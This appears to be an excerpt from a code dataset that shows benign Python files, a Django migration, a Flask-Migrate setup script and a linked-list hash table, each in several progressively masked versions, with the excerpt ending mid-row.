code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('Registration', '0015_auto_20150525_1815')]
operations = [migrations.AlterField(model_name='user', name=
'created_date', field=models.DateField(auto_now_add=True)),
migrations.AlterField(model_name='user', name='last_login', field=
models.DateTimeField(null=True, verbose_name='last login', blank=
True)), migrations.AlterField(model_name='user', name=
'modified_date', field=models.DateField(auto_now=True)), migrations
.AlterField(model_name='user_skills', name='percentage', field=
models.PositiveSmallIntegerField(default=0, validators=[django.core
.validators.MinValueValidator(0), django.core.validators.
MaxValueValidator(100)]))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
import django.core.validators
class Migration(migrations.Migration):
dependencies = [('Registration', '0015_auto_20150525_1815')]
operations = [migrations.AlterField(model_name='user', name=
'created_date', field=models.DateField(auto_now_add=True)),
migrations.AlterField(model_name='user', name='last_login', field=
models.DateTimeField(null=True, verbose_name='last login', blank=
True)), migrations.AlterField(model_name='user', name=
'modified_date', field=models.DateField(auto_now=True)), migrations
.AlterField(model_name='user_skills', name='percentage', field=
models.PositiveSmallIntegerField(default=0, validators=[django.core
.validators.MinValueValidator(0), django.core.validators.
MaxValueValidator(100)]))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('Registration', '0015_auto_20150525_1815'),
]
operations = [
migrations.AlterField(
model_name='user',
name='created_date',
field=models.DateField(auto_now_add=True),
),
migrations.AlterField(
model_name='user',
name='last_login',
field=models.DateTimeField(null=True, verbose_name='last login', blank=True),
),
migrations.AlterField(
model_name='user',
name='modified_date',
field=models.DateField(auto_now=True),
),
migrations.AlterField(
model_name='user_skills',
name='percentage',
field=models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(100)]),
),
]
|
flexible
|
{
"blob_id": "7a1be5c9c48413ba1969631e99ecb45cf15ef613",
"index": 559,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('Registration', '0015_auto_20150525_1815')]\n operations = [migrations.AlterField(model_name='user', name=\n 'created_date', field=models.DateField(auto_now_add=True)),\n migrations.AlterField(model_name='user', name='last_login', field=\n models.DateTimeField(null=True, verbose_name='last login', blank=\n True)), migrations.AlterField(model_name='user', name=\n 'modified_date', field=models.DateField(auto_now=True)), migrations\n .AlterField(model_name='user_skills', name='percentage', field=\n models.PositiveSmallIntegerField(default=0, validators=[django.core\n .validators.MinValueValidator(0), django.core.validators.\n MaxValueValidator(100)]))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n dependencies = [('Registration', '0015_auto_20150525_1815')]\n operations = [migrations.AlterField(model_name='user', name=\n 'created_date', field=models.DateField(auto_now_add=True)),\n migrations.AlterField(model_name='user', name='last_login', field=\n models.DateTimeField(null=True, verbose_name='last login', blank=\n True)), migrations.AlterField(model_name='user', name=\n 'modified_date', field=models.DateField(auto_now=True)), migrations\n .AlterField(model_name='user_skills', name='percentage', field=\n models.PositiveSmallIntegerField(default=0, validators=[django.core\n .validators.MinValueValidator(0), django.core.validators.\n MaxValueValidator(100)]))]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Registration', '0015_auto_20150525_1815'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_date',\n field=models.DateField(auto_now_add=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='last_login',\n field=models.DateTimeField(null=True, verbose_name='last login', blank=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='modified_date',\n field=models.DateField(auto_now=True),\n ),\n migrations.AlterField(\n model_name='user_skills',\n name='percentage',\n field=models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(100)]),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
'''
@Description: 数据库迁移
@Author: Zpp
@Date: 2020-03-30 11:01:56
@LastEditors: Zpp
@LastEditTime: 2020-04-28 09:55:26
'''
import sys
import os
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(rootPath)
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
from conf.setting import Config
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = Config().get_sql_url()
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
from models.salary import *
from models.system import *
from models.log import *
# 初始化 migrate
# 两个参数一个是 Flask 的 app,一个是数据库 db
migrate = Migrate(app, db)
# 初始化管理器
manager = Manager(app)
# 添加 db 命令,并与 MigrateCommand 绑定
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
|
normal
|
{
"blob_id": "69ebdab4cd1f0b5154305410381db252205ff97d",
"index": 9768,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsys.path.append(rootPath)\n<mask token>\nmanager.add_command('db', MigrateCommand)\nif __name__ == '__main__':\n manager.run()\n",
"step-3": "<mask token>\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n<mask token>\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = Config().get_sql_url()\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n<mask token>\nmigrate = Migrate(app, db)\nmanager = Manager(app)\nmanager.add_command('db', MigrateCommand)\nif __name__ == '__main__':\n manager.run()\n",
"step-4": "<mask token>\nimport sys\nimport os\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_script import Manager\nfrom flask_migrate import Migrate, MigrateCommand\nfrom conf.setting import Config\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = Config().get_sql_url()\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nfrom models.salary import *\nfrom models.system import *\nfrom models.log import *\nmigrate = Migrate(app, db)\nmanager = Manager(app)\nmanager.add_command('db', MigrateCommand)\nif __name__ == '__main__':\n manager.run()\n",
"step-5": "#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n'''\n@Description: 数据库迁移\n@Author: Zpp\n@Date: 2020-03-30 11:01:56\n@LastEditors: Zpp\n@LastEditTime: 2020-04-28 09:55:26\n'''\nimport sys\nimport os\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_script import Manager\nfrom flask_migrate import Migrate, MigrateCommand\nfrom conf.setting import Config\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = Config().get_sql_url()\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nfrom models.salary import *\nfrom models.system import *\nfrom models.log import *\n\n# 初始化 migrate\n# 两个参数一个是 Flask 的 app,一个是数据库 db\nmigrate = Migrate(app, db)\n\n# 初始化管理器\nmanager = Manager(app)\n# 添加 db 命令,并与 MigrateCommand 绑定\nmanager.add_command('db', MigrateCommand)\n\n\nif __name__ == '__main__':\n manager.run()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class HashTable:
<|reserved_special_token_0|>
def __init__(self, capacity):
self.capacity = capacity
self.storage = [None] * capacity
self.numberOfItems = 0
def fnv1(self, key):
"""
FNV-1 64-bit hash function
Implement this, and/or DJB2.
"""
hash = 14695981039346656037
for n in key.encode():
hash = hash ^ n
hash = hash * 1099511628211
return hash
def djb2(self, key):
"""
DJB2 32-bit hash function
Implement this, and/or FNV-1.
"""
hash = 5381
for n in key.encode():
hash = hash * 33 + n
return hash
<|reserved_special_token_0|>
def put(self, key, value):
"""
Store the value with the given key.
Hash collisions should be handled with Linked List Chaining.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
if current.key == key:
current.value = value
else:
current.next = HashTableEntry(key, value)
self.numberOfItems += 1
else:
self.storage[hi] = HashTableEntry(key, value)
self.numberOfItems += 1
self.calculateLoad()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def resize(self, factor=2):
"""
Doubles the capacity of the hash table and
rehash all key/value pairs.
Implement this.
"""
self.capacity = round(self.capacity * factor)
newarr = [None] * self.capacity
for i, v in enumerate(self.storage):
while v:
hi = self.hash_index(v.key)
if newarr[hi]:
current = newarr[hi]
while current.next:
current = current.next
current.next = HashTableEntry(v.key, v.value)
else:
newarr[hi] = HashTableEntry(v.key, v.value)
v = v.next
self.storage = newarr
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class HashTable:
"""
A hash table that with `capacity` buckets
that accepts string keys
Implement this.
"""
def __init__(self, capacity):
self.capacity = capacity
self.storage = [None] * capacity
self.numberOfItems = 0
def fnv1(self, key):
"""
FNV-1 64-bit hash function
Implement this, and/or DJB2.
"""
hash = 14695981039346656037
for n in key.encode():
hash = hash ^ n
hash = hash * 1099511628211
return hash
def djb2(self, key):
"""
DJB2 32-bit hash function
Implement this, and/or FNV-1.
"""
hash = 5381
for n in key.encode():
hash = hash * 33 + n
return hash
def hash_index(self, key):
"""
Take an arbitrary key and return a valid integer index
between within the storage capacity of the hash table.
"""
return self.djb2(key) % self.capacity
def put(self, key, value):
"""
Store the value with the given key.
Hash collisions should be handled with Linked List Chaining.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
if current.key == key:
current.value = value
else:
current.next = HashTableEntry(key, value)
self.numberOfItems += 1
else:
self.storage[hi] = HashTableEntry(key, value)
self.numberOfItems += 1
self.calculateLoad()
def delete(self, key):
"""
Remove the value stored with the given key.
Print a warning if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
current = self.storage[hi]
prev = self.storage[hi]
while current and current.key != key:
prev = current
current = current.next
if current and current.key == key:
if current == self.storage[hi]:
self.storage[hi] = current.next
else:
prev.next = current.next
self.numberOfItems -= 1
else:
print('WARNING: no key')
self.calculateLoad()
def get(self, key):
"""
Retrieve the value stored with the given key.
Returns None if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
if self.storage[hi].next:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
return current.value
else:
return self.storage[hi].value
return None
def resize(self, factor=2):
"""
Doubles the capacity of the hash table and
rehash all key/value pairs.
Implement this.
"""
self.capacity = round(self.capacity * factor)
newarr = [None] * self.capacity
for i, v in enumerate(self.storage):
while v:
hi = self.hash_index(v.key)
if newarr[hi]:
current = newarr[hi]
while current.next:
current = current.next
current.next = HashTableEntry(v.key, v.value)
else:
newarr[hi] = HashTableEntry(v.key, v.value)
v = v.next
self.storage = newarr
def calculateLoad(self):
load = self.numberOfItems / len(self.storage)
if load > 0.7:
self.resize(2)
elif load < 0.2:
self.resize(0.5)
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class HashTableEntry:
<|reserved_special_token_0|>
def __init__(self, key, value):
self.key = key
self.value = value
self.next = None
class HashTable:
"""
A hash table that with `capacity` buckets
that accepts string keys
Implement this.
"""
def __init__(self, capacity):
self.capacity = capacity
self.storage = [None] * capacity
self.numberOfItems = 0
def fnv1(self, key):
"""
FNV-1 64-bit hash function
Implement this, and/or DJB2.
"""
hash = 14695981039346656037
for n in key.encode():
hash = hash ^ n
hash = hash * 1099511628211
return hash
def djb2(self, key):
"""
DJB2 32-bit hash function
Implement this, and/or FNV-1.
"""
hash = 5381
for n in key.encode():
hash = hash * 33 + n
return hash
def hash_index(self, key):
"""
Take an arbitrary key and return a valid integer index
between within the storage capacity of the hash table.
"""
return self.djb2(key) % self.capacity
def put(self, key, value):
"""
Store the value with the given key.
Hash collisions should be handled with Linked List Chaining.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
if current.key == key:
current.value = value
else:
current.next = HashTableEntry(key, value)
self.numberOfItems += 1
else:
self.storage[hi] = HashTableEntry(key, value)
self.numberOfItems += 1
self.calculateLoad()
def delete(self, key):
"""
Remove the value stored with the given key.
Print a warning if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
current = self.storage[hi]
prev = self.storage[hi]
while current and current.key != key:
prev = current
current = current.next
if current and current.key == key:
if current == self.storage[hi]:
self.storage[hi] = current.next
else:
prev.next = current.next
self.numberOfItems -= 1
else:
print('WARNING: no key')
self.calculateLoad()
def get(self, key):
"""
Retrieve the value stored with the given key.
Returns None if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
if self.storage[hi].next:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
return current.value
else:
return self.storage[hi].value
return None
def resize(self, factor=2):
"""
Doubles the capacity of the hash table and
rehash all key/value pairs.
Implement this.
"""
self.capacity = round(self.capacity * factor)
newarr = [None] * self.capacity
for i, v in enumerate(self.storage):
while v:
hi = self.hash_index(v.key)
if newarr[hi]:
current = newarr[hi]
while current.next:
current = current.next
current.next = HashTableEntry(v.key, v.value)
else:
newarr[hi] = HashTableEntry(v.key, v.value)
v = v.next
self.storage = newarr
def calculateLoad(self):
load = self.numberOfItems / len(self.storage)
if load > 0.7:
self.resize(2)
elif load < 0.2:
self.resize(0.5)
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class HashTableEntry:
"""
Hash Table entry, as a linked list node.
"""
def __init__(self, key, value):
self.key = key
self.value = value
self.next = None
class HashTable:
"""
A hash table that with `capacity` buckets
that accepts string keys
Implement this.
"""
def __init__(self, capacity):
self.capacity = capacity
self.storage = [None] * capacity
self.numberOfItems = 0
def fnv1(self, key):
"""
FNV-1 64-bit hash function
Implement this, and/or DJB2.
"""
hash = 14695981039346656037
for n in key.encode():
hash = hash ^ n
hash = hash * 1099511628211
return hash
def djb2(self, key):
"""
DJB2 32-bit hash function
Implement this, and/or FNV-1.
"""
hash = 5381
for n in key.encode():
hash = hash * 33 + n
return hash
def hash_index(self, key):
"""
Take an arbitrary key and return a valid integer index
between within the storage capacity of the hash table.
"""
return self.djb2(key) % self.capacity
def put(self, key, value):
"""
Store the value with the given key.
Hash collisions should be handled with Linked List Chaining.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
if current.key == key:
current.value = value
else:
current.next = HashTableEntry(key, value)
self.numberOfItems += 1
else:
self.storage[hi] = HashTableEntry(key, value)
self.numberOfItems += 1
self.calculateLoad()
def delete(self, key):
"""
Remove the value stored with the given key.
Print a warning if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
current = self.storage[hi]
prev = self.storage[hi]
while current and current.key != key:
prev = current
current = current.next
if current and current.key == key:
if current == self.storage[hi]:
self.storage[hi] = current.next
else:
prev.next = current.next
self.numberOfItems -= 1
else:
print('WARNING: no key')
self.calculateLoad()
def get(self, key):
"""
Retrieve the value stored with the given key.
Returns None if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
if self.storage[hi].next:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
return current.value
else:
return self.storage[hi].value
return None
def resize(self, factor=2):
"""
Doubles the capacity of the hash table and
rehash all key/value pairs.
Implement this.
"""
self.capacity = round(self.capacity * factor)
newarr = [None] * self.capacity
for i, v in enumerate(self.storage):
while v:
hi = self.hash_index(v.key)
if newarr[hi]:
current = newarr[hi]
while current.next:
current = current.next
current.next = HashTableEntry(v.key, v.value)
else:
newarr[hi] = HashTableEntry(v.key, v.value)
v = v.next
self.storage = newarr
def calculateLoad(self):
load = self.numberOfItems / len(self.storage)
if load > 0.7:
self.resize(2)
elif load < 0.2:
self.resize(0.5)
pass
if __name__ == '__main__':
ht = HashTable(2)
ht.put('line_1', '111')
ht.put('line_2', '222')
ht.put('line_3', '333')
ht.put('line_4', 'sss')
ht.put('line_5', 'ddd')
ht.put('line_6', 'ggg')
ht.put('line_7', 'hhh')
ht.put('line_12', 'jjj')
print('')
old_capacity = len(ht.storage)
ht.resize()
new_capacity = len(ht.storage)
print(f'\nResized from {old_capacity} to {new_capacity}.\n')
print('')
for i, v in enumerate(ht.storage):
while v:
print(i, v.value)
v = v.next
print('')
ht.delete('line_3')
print('')
for i, v in enumerate(ht.storage):
while v:
print(i, v.value)
v = v.next
print('')
print('')
<|reserved_special_token_1|>
class HashTableEntry:
"""
Hash Table entry, as a linked list node.
"""
def __init__(self, key, value):
self.key = key
self.value = value
self.next = None
class HashTable:
"""
A hash table that with `capacity` buckets
that accepts string keys
Implement this.
"""
def __init__(self, capacity):
self.capacity = capacity
self.storage = [None] * capacity
self.numberOfItems = 0
def fnv1(self, key):
"""
FNV-1 64-bit hash function
Implement this, and/or DJB2.
"""
# hash = 0xff
hash = 0xcbf29ce484222325
for n in key.encode():
# print(n)
hash = hash ^ n
hash = hash * 0x100000001b3
# print(hash)
return hash
def djb2(self, key):
"""
DJB2 32-bit hash function
Implement this, and/or FNV-1.
"""
hash = 5381
for n in key.encode():
# hash = ((hash << 5) + hash) + n
hash = hash * 33 + n
return hash
# return hash & 0xFFFFFFFF
def hash_index(self, key):
"""
Take an arbitrary key and return a valid integer index
between within the storage capacity of the hash table.
"""
# return self.fnv1(key) % self.capacity
return self.djb2(key) % self.capacity
def put(self, key, value):
"""
Store the value with the given key.
Hash collisions should be handled with Linked List Chaining.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
if current.key == key:
current.value = value
else:
current.next = HashTableEntry(key, value)
self.numberOfItems += 1
else:
self.storage[hi] = HashTableEntry(key, value)
self.numberOfItems += 1
self.calculateLoad()
def delete(self, key):
"""
Remove the value stored with the given key.
Print a warning if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
# if that hi is empty ignore
# if self.storage[hi] is None:
# print("WARNING: no key")
# return
current = self.storage[hi]
prev = self.storage[hi]
while current and current.key != key:
prev = current
current = current.next
if (current and current.key == key):
# if its the first link in the list
if (current == self.storage[hi]):
self.storage[hi] = current.next
else:
prev.next = current.next
self.numberOfItems -= 1
else:
print("WARNING: no key")
self.calculateLoad()
def get(self, key):
"""
Retrieve the value stored with the given key.
Returns None if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
if (self.storage[hi]):
if(self.storage[hi].next):
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
return current.value
else:
return self.storage[hi].value
return None
def resize(self, factor=2):
"""
Doubles the capacity of the hash table and
rehash all key/value pairs.
Implement this.
"""
self.capacity = round(self.capacity*factor)
newarr = [None] * self.capacity
for i, v in enumerate(self.storage):
while v:
hi = self.hash_index(v.key)
if newarr[hi]:
current = newarr[hi]
while current.next:
current = current.next
current.next = HashTableEntry(v.key, v.value)
else:
newarr[hi] = HashTableEntry(v.key, v.value)
v = v.next
self.storage = newarr
# Solution 2 - Much cleaner
# newHashTable = HashTable(round(self.capacity*factor))
# for i, v in enumerate(self.storage):
# while v:
# newHashTable.put(v.key, v.value)
# v = v.next
# self.capacity = newHashTable.capacity
# self.storage = newHashTable.storage
def calculateLoad(self):
load = self.numberOfItems/len(self.storage)
# print("Items:\t", ht.numberOfItems)
# print("Storage:", len(ht.storage))
# print("LOAD:\t", load)
# comment code bellow to pass tests
if load > 0.7:
self.resize(2)
elif load < 0.2:
self.resize(0.5)
pass
if __name__ == "__main__":
ht = HashTable(2)
ht.put("line_1", "111")
ht.put("line_2", "222")
ht.put("line_3", "333")
ht.put("line_4", "sss")
ht.put("line_5", "ddd")
ht.put("line_6", "ggg")
ht.put("line_7", "hhh")
ht.put("line_12", "jjj")
print("")
# Test storing beyond capacity
# print(ht.get("line_1"))
# print(ht.get("line_2"))
# print(ht.get("line_3"))
# print(ht.get("line_4"))
# print(ht.get("line_5"))
# print(ht.get("line_6"))
# print(ht.get("line_7"))
# Test resizing
old_capacity = len(ht.storage)
ht.resize()
new_capacity = len(ht.storage)
print(f"\nResized from {old_capacity} to {new_capacity}.\n")
# print("1: ", ht.storage[1].value)
# print("1: ", ht.storage[1].next.value)
# print("3: ", ht.storage[3].value)
# print("3: ", ht.storage[3].next.value)
# print("3: ", ht.storage[3].next.next.value)
print("")
for i, v in enumerate(ht.storage):
while v:
print(i, v.value)
v = v.next
print("")
ht.delete("line_3")
print("")
for i, v in enumerate(ht.storage):
while v:
print(i, v.value)
v = v.next
print("")
# Test if data intact after resizing
# print(ht.get("line_1"))
# print(ht.get("line_2"))
# print(ht.get("line_3"))
# print(ht.get("line_4"))
# print(ht.get("line_5"))
# print(ht.get("line_6"))
# print(ht.get("line_7"))
print("")
|
flexible
|
{
"blob_id": "7e58fe636e6d835d7857a49900bbc127b52f63d9",
"index": 6112,
"step-1": "<mask token>\n\n\nclass HashTable:\n <mask token>\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.storage = [None] * capacity\n self.numberOfItems = 0\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 64-bit hash function\n\n Implement this, and/or DJB2.\n \"\"\"\n hash = 14695981039346656037\n for n in key.encode():\n hash = hash ^ n\n hash = hash * 1099511628211\n return hash\n\n def djb2(self, key):\n \"\"\"\n DJB2 32-bit hash function\n\n Implement this, and/or FNV-1.\n \"\"\"\n hash = 5381\n for n in key.encode():\n hash = hash * 33 + n\n return hash\n <mask token>\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n if current.key == key:\n current.value = value\n else:\n current.next = HashTableEntry(key, value)\n self.numberOfItems += 1\n else:\n self.storage[hi] = HashTableEntry(key, value)\n self.numberOfItems += 1\n self.calculateLoad()\n <mask token>\n <mask token>\n\n def resize(self, factor=2):\n \"\"\"\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Implement this.\n \"\"\"\n self.capacity = round(self.capacity * factor)\n newarr = [None] * self.capacity\n for i, v in enumerate(self.storage):\n while v:\n hi = self.hash_index(v.key)\n if newarr[hi]:\n current = newarr[hi]\n while current.next:\n current = current.next\n current.next = HashTableEntry(v.key, v.value)\n else:\n newarr[hi] = HashTableEntry(v.key, v.value)\n v = v.next\n self.storage = newarr\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass HashTable:\n \"\"\"\n A hash table that with `capacity` buckets\n that accepts string keys\n\n Implement this.\n \"\"\"\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.storage = [None] * capacity\n self.numberOfItems = 0\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 64-bit hash function\n\n Implement this, and/or DJB2.\n \"\"\"\n hash = 14695981039346656037\n for n in key.encode():\n hash = hash ^ n\n hash = hash * 1099511628211\n return hash\n\n def djb2(self, key):\n \"\"\"\n DJB2 32-bit hash function\n\n Implement this, and/or FNV-1.\n \"\"\"\n hash = 5381\n for n in key.encode():\n hash = hash * 33 + n\n return hash\n\n def hash_index(self, key):\n \"\"\"\n Take an arbitrary key and return a valid integer index\n between within the storage capacity of the hash table.\n \"\"\"\n return self.djb2(key) % self.capacity\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n if current.key == key:\n current.value = value\n else:\n current.next = HashTableEntry(key, value)\n self.numberOfItems += 1\n else:\n self.storage[hi] = HashTableEntry(key, value)\n self.numberOfItems += 1\n self.calculateLoad()\n\n def delete(self, key):\n \"\"\"\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n current = self.storage[hi]\n prev = self.storage[hi]\n while current and current.key != key:\n prev = current\n current = current.next\n if current and current.key == key:\n if current == self.storage[hi]:\n self.storage[hi] = current.next\n else:\n prev.next = current.next\n self.numberOfItems -= 1\n else:\n print('WARNING: no key')\n self.calculateLoad()\n\n def get(self, 
key):\n \"\"\"\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n if self.storage[hi].next:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n return current.value\n else:\n return self.storage[hi].value\n return None\n\n def resize(self, factor=2):\n \"\"\"\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Implement this.\n \"\"\"\n self.capacity = round(self.capacity * factor)\n newarr = [None] * self.capacity\n for i, v in enumerate(self.storage):\n while v:\n hi = self.hash_index(v.key)\n if newarr[hi]:\n current = newarr[hi]\n while current.next:\n current = current.next\n current.next = HashTableEntry(v.key, v.value)\n else:\n newarr[hi] = HashTableEntry(v.key, v.value)\n v = v.next\n self.storage = newarr\n\n def calculateLoad(self):\n load = self.numberOfItems / len(self.storage)\n if load > 0.7:\n self.resize(2)\n elif load < 0.2:\n self.resize(0.5)\n pass\n\n\n<mask token>\n",
"step-3": "class HashTableEntry:\n <mask token>\n\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.next = None\n\n\nclass HashTable:\n \"\"\"\n A hash table that with `capacity` buckets\n that accepts string keys\n\n Implement this.\n \"\"\"\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.storage = [None] * capacity\n self.numberOfItems = 0\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 64-bit hash function\n\n Implement this, and/or DJB2.\n \"\"\"\n hash = 14695981039346656037\n for n in key.encode():\n hash = hash ^ n\n hash = hash * 1099511628211\n return hash\n\n def djb2(self, key):\n \"\"\"\n DJB2 32-bit hash function\n\n Implement this, and/or FNV-1.\n \"\"\"\n hash = 5381\n for n in key.encode():\n hash = hash * 33 + n\n return hash\n\n def hash_index(self, key):\n \"\"\"\n Take an arbitrary key and return a valid integer index\n between within the storage capacity of the hash table.\n \"\"\"\n return self.djb2(key) % self.capacity\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n if current.key == key:\n current.value = value\n else:\n current.next = HashTableEntry(key, value)\n self.numberOfItems += 1\n else:\n self.storage[hi] = HashTableEntry(key, value)\n self.numberOfItems += 1\n self.calculateLoad()\n\n def delete(self, key):\n \"\"\"\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n current = self.storage[hi]\n prev = self.storage[hi]\n while current and current.key != key:\n prev = current\n current = current.next\n if current and current.key == key:\n if current == self.storage[hi]:\n self.storage[hi] = current.next\n else:\n prev.next 
= current.next\n self.numberOfItems -= 1\n else:\n print('WARNING: no key')\n self.calculateLoad()\n\n def get(self, key):\n \"\"\"\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n if self.storage[hi].next:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n return current.value\n else:\n return self.storage[hi].value\n return None\n\n def resize(self, factor=2):\n \"\"\"\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Implement this.\n \"\"\"\n self.capacity = round(self.capacity * factor)\n newarr = [None] * self.capacity\n for i, v in enumerate(self.storage):\n while v:\n hi = self.hash_index(v.key)\n if newarr[hi]:\n current = newarr[hi]\n while current.next:\n current = current.next\n current.next = HashTableEntry(v.key, v.value)\n else:\n newarr[hi] = HashTableEntry(v.key, v.value)\n v = v.next\n self.storage = newarr\n\n def calculateLoad(self):\n load = self.numberOfItems / len(self.storage)\n if load > 0.7:\n self.resize(2)\n elif load < 0.2:\n self.resize(0.5)\n pass\n\n\n<mask token>\n",
